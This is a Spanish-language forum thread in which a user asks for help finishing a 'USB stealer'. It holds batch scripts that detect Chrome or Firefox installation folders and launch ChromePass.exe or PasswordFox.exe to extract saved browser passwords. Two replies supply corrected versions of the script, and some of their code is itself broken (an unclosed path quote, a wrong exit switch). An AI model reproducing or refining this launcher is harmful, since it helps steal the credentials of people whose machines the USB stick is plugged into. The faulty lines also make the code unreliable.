[SOLUCIONADO] [BATCH] Problemilla con comandos.

Iniciado por copernico, Agosto 28, 2016, 09:51:22 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 28, 2016, 09:51:22 AM Ultima modificación: Agosto 28, 2016, 12:47:44 PM por blackdrake
Hola muy buenas, estoy intentando crear un pequeñillo USB stealer (bastante simplon la verdad) pero me ha surgido el problema de que mientras terminaba de escribirlo todo me ha surgido el siguiente problema, me gustaría hacer un script que detectase si existe la carpeta de Google Chrome y si lo hace correr el archivo ChromeStealer.vbs, si no existiera esa carpeta que comprobase si existe la carpeta de FireFox y si existe que corra el archivo FireStealer.vbs y si no existen ninguna de las dos que no haga nada.
Perdón por la pregunta, sé que es muy de novato, pero es lo que tiene ser un noob.

El codigo que he escrito es el siguiente:

Código: dos
@echo off >Nul
IF EXIST "\Google\Chrome" (start ChromePass.exe) ELSE (echo Chrome Not found!)
IF EXIST "\Mozilla Firefox" (start PasswordFox.exe) ELSE (echo Firefox Not found!)
pause >nul
@exit /B


Me da error pese a que tengo los dos programas instalados en el pc

Copernico.

Muchas gracias.

Copernico

Sencillo, la ruta de las carpetas es errónea, debes escribirla de la siguiente manera:

Código: dos
@echo off >Nul
IF EXIST "C:\Program Files\Google (start ChromePass.exe) ELSE (echo Chrome Not found!)
IF EXIST "C:\Program Files\Mozilla Firefox" (start PasswordFox.exe) ELSE (echo Firefox Not found!)
pause >nul
@exit /B


Marco el tema como solucionado, si tienes problemas, simplemente responde este post :D

Un saludo :P



Agosto 28, 2016, 02:08:26 PM #2 Ultima modificación: Agosto 28, 2016, 02:16:35 PM por grep
Otra forma de hacer los mismo:

Código: dos
@echo off

SETLOCAL
SET EXIST_GOOGLE=false
SET EXIST_MOZILLA_FIREFOX=false

IF EXIST "%ProgramFiles(x86)%\Google" SET EXIST_GOOGLE=true
IF EXIST "%ProgramFiles%\Google" SET EXIST_GOOGLE=true
IF %EXIST_GOOGLE%==true (
    start ChromePass.exe
) ELSE (
    echo Chrome Not found!
)

IF EXIST %ProgramFiles(x86)%\Mozilla Firefox SET EXIST_MOZILLA_FIREFOX=true
IF EXIST %ProgramFiles%\Mozilla Firefox SET EXIST_MOZILLA_FIREFOX=true
IF %EXIST_MOZILLA_FIREFOX%==true (
    start PasswordFox.exe
) ELSE (
    echo Firefox Not found!
)

pause > NUL
exit \B 0


Saludos